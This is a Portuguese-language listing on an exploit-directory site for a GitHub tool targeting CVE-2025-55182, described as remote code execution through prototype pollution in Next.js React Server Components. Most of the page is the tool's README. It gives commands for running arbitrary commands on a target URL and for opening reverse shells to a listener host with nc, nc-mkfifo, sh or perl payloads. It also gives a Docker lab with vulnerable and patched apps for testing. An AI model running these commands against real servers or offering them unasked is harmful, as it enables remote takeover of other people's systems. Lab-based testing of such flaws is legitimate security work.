Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182 — Exploit para CVE-2025-55182 que permite execução remota de código via poluição de protótipo em Next.js React Server Components, com capacidades de execução de comandos e shell reversa. | Kitploit
Ferramentas/GitHubGitHub/mr-destroyer/cve-2025-55182
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingDesenvolvimento de PayloadsLabs e Prática
GitHubmr-destroyer/cve-2025-55182

CVE-2025-55182

Exploit para CVE-2025-55182 que permite execução remota de código via poluição de protótipo em Next.js React Server Components, com capacidades de execução de comandos e shell reversa.

Ver Repositório
13há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit de RCE em React Server Components do Next.js

Explora a CVE-2025-55182 para execução remota de código via poluição de protótipo.

Instalação

uv sync

Uso

Execução de Comandos

source .venv/bin/activate
python3 exploit.py -u https://example.com -c "id"

Shell Reverso

python3 exploit.py -u https://example.com -r -l YOUR_IP -p 4444 -P nc-mkfifo

Opções

  • -u, --url: URL/host para verificar (obrigatório)
  • -c, --cmd: Comando a executar
  • -r, --reverse: Ativa o modo de shell reverso
  • -l, --lhost: Host do listener para o shell reverso
  • -p, --lport: Porta do listener para o shell reverso
  • -P, --payload: Tipo de payload do shell reverso: nc, nc-mkfifo, sh, perl (padrão: nc)
  • --timeout: Tempo limite de requisição em segundos (padrão: 10)

Exemplos

# Execute command
python3 exploit.py -u https://example.com -c "whoami"

# Reverse shell with nc-mkfifo (recommended for Alpine)
python3 exploit.py -u https://example.com -r -l 172.29.0.1 -p 4444 -P nc-mkfifo

Ambiente de Laboratório

O diretório lab/ contém uma configuração Docker completa para testar o exploit.

Configuração

cd lab
docker-compose up -d

Isso iniciará dois serviços:

  • vulnerable: Aplicação Next.js vulnerável na porta 3011
  • patched: Aplicação Next.js corrigida na porta 3012

Testando

# Test on vulnerable instance
python3 exploit.py -u http://localhost:3011 -c "id"

# Test reverse shell (get gateway IP first)
GATEWAY=$(docker network inspect lab_react-rsc-lab --format '{{range .IPAM.Config}}{{.Gateway}}{{end}}')
python3 exploit.py -u http://localhost:3011 -r -l $GATEWAY -p 4444 -P nc-mkfifo
Baixar ferramenta